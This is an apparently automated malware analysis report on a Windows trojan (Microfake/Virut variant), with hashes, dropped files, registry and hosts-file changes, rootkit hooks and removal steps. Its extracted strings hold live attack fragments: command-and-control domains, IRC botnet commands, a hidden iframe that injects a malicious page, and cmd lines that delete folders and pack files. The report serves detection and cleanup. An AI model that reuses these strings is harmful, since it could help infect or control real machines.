Trojan.Microfake.D_97a955f7a6
Trojan.Win32.MicroFake.ba (Kaspersky), Trojan.Microfake.D (B) (Emsisoft), Trojan.Microfake.D (AdAware), VirusVirut.YR, DDoSNitol.YR (Lavasoft MAS)
Behaviour: Trojan, Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 97a955f7a6142ee474a7418edb4ec28f
SHA1: 6a12f63ae3ff28f7f1a4e811a1325b126e766509
SHA256: 0ad9a45233635b67a6064a85adabcff59e994ffeb1a4b9dfc14bd0649e9107c1
SSDeep: 12288:wSqi3gVW41lychX1f9XgcgX2Z9Vq8OI/p9snp4R1siXyaE:wSd3KiiXp0WHqYR neR1Wa
Size: 502784 bytes
File type: DLL
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-06-08 12:59:36
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:2060
hrl7B85.tmp:1900
The Trojan injects its code into the following process(es):
ccoecm.exe:1796
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process regsvr32.exe:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\hrl7B85.tmp (990 bytes)
The process hrl7B85.tmp:1900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\ccoecm.exe (3073 bytes)
The process ccoecm.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\hra33.dll (7 bytes)
C:\RCX7EDF.tmp (14428 bytes)
C:\Windows\Sys (503 bytes)
C:\Boot\lpk.dll (3073 bytes)
Registry activity
The process hrl7B85.tmp:1900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\Distribuoeq]
"Description" = "Distribucjx Transaction Coordinator Service."
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SOFTWARE.LOG,"
Dropped PE files
| MD5 | File path |
|---|---|
| 68be8c9c35ca8b4a1591bdc7599be8a7 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SOFTWARE.LOG |
| 68be8c9c35ca8b4a1591bdc7599be8a7 | c:\Windows\System32\ccoecm.exe |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:
| 127.0.0.1 | www.Brenz.pl |
| 127.0.0.1 | validation.sls.microsoft.com |
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 2860 | 3072 | 3.84485 | c9b6b9fbded3d4764666702b145428d1 |
| .rdata | 8192 | 2505 | 2560 | 3.36056 | 6951ee1a0ff3a7f5a44727b4713506a3 |
| .data | 12288 | 672 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 16384 | 495252 | 495616 | 5.22281 | eeb07a08a87fdea591ba95f78396a5da |
| .reloc | 512000 | 494 | 512 | 3.52939 | cfa8d04dd000bb30ab126902176ed40d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| dingtao333.3322.org | |
| ilo.brenz.pl | |
| teredo.ipv6.microsoft.com | |
| dns.msftncsi.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Known Hostile Domain ilo.brenz.pl Lookup
Traffic
p.....CZ................aI..YC.A.t......8b...YE..J9*#............C.S
:irc 001 zkxbabfm :Hi virtu.:irc 376 zkxbabfm :End of /MOTD command.:i
rc 001 zkxbabfm :Hi virtu.:irc 376 zkxbabfm :End of /MOTD command..:zk
xbabfm JOIN #.0..:zkxbabfm JOIN #.0.
The Trojan connects to the servers at the folowing location(s):
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
USER32.dll
msvcrt.dll
ole32.dll
ntdll.dll
COMCTL32.dll
Bv9.HkMaCv
Av.TBv
regsvr32.pdb
RegCloseKey
RegOpenKeyExW
_wcmdln
_amsg_exit
version="5.1.0.0"
name="Microsoft.Windows.RegSvr32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
\regsvr32.exe
user32.dll
Excessive # of DLL's on cmdline
6.1.7600.16385 (win7_rtm.090713-1255)
REGSVR32.EXE
Windows
Operating System
6.1.7600.16385
ccoecm.exe_1796:
.text
`.rdata
@.data
.rsrc
USER32.dll
ADVAPI32.dll
SHELL32.dll
WS2_32.dll
WINMM.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
ShellExecuteA
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
dingtao333.3322.org:1
-2146744890-2146744890
kernel32.dll
%u.%u.%u.%u
hra%u.dll
iexplore.exe
stf%c%c%c%c%c.exe
PlusCtrl.dll
SOFTWARE.LOG
%c%c%c%c%c%c.exe
%u MB
%u MHz
Windows NT
Windows 7
Windows 2008
Windows Vista
Windows 2003
Windows XP
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
#0%s!
%s/%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
192.168.1.244
@.reloc
SHLWAPI.dll
lpk.dll
3.iNU
=teJ,puDp
Pv.zuG
r8%XZ#Y
.RoyrXD
j;.lj0P
].QX$
L@.tn0
f.ovk
o"r%dM
[M0.Bx
.bsL,]x$
<l.jz%A
.EUB>s
}lf/.iV
i%DjEd
M.qN^v
.GJGS
u-I}K
h.xLH
%DzPP
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
yi.kilme.pl
sp.iqchk.pl
knx.remp.pl
qq.limag.ru
kto.gind.at
NICK evzjairu
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
ilo.brenz.pl
ant.trenz.pl
NICK ybywmaow
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 VVV.Brenz.pl
#<iframe style="height:1px" src="hXXp://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
1, 0, 0, 1
server.EXE
ccoecm.exe_1796_rwx_00422000_00001000:
j;.lj0P
ccoecm.exe_1796_rwx_00469000_00001000:
%DzPP
ccoecm.exe_1796_rwx_00470000_0000F000:
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
yi.kilme.pl
sp.iqchk.pl
knx.remp.pl
qq.limag.ru
kto.gind.at
NICK evzjairu
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
ilo.brenz.pl
ant.trenz.pl
NICK ybywmaow
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 VVV.Brenz.pl
#<iframe style="height:1px" src="hXXp://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:2060
hrl7B85.tmp:1900 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\hrl7B85.tmp (990 bytes)
C:\Windows\System32\ccoecm.exe (3073 bytes)
C:\Windows\System32\hra33.dll (7 bytes)
C:\RCX7EDF.tmp (14428 bytes)
C:\Boot\lpk.dll (3073 bytes) - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.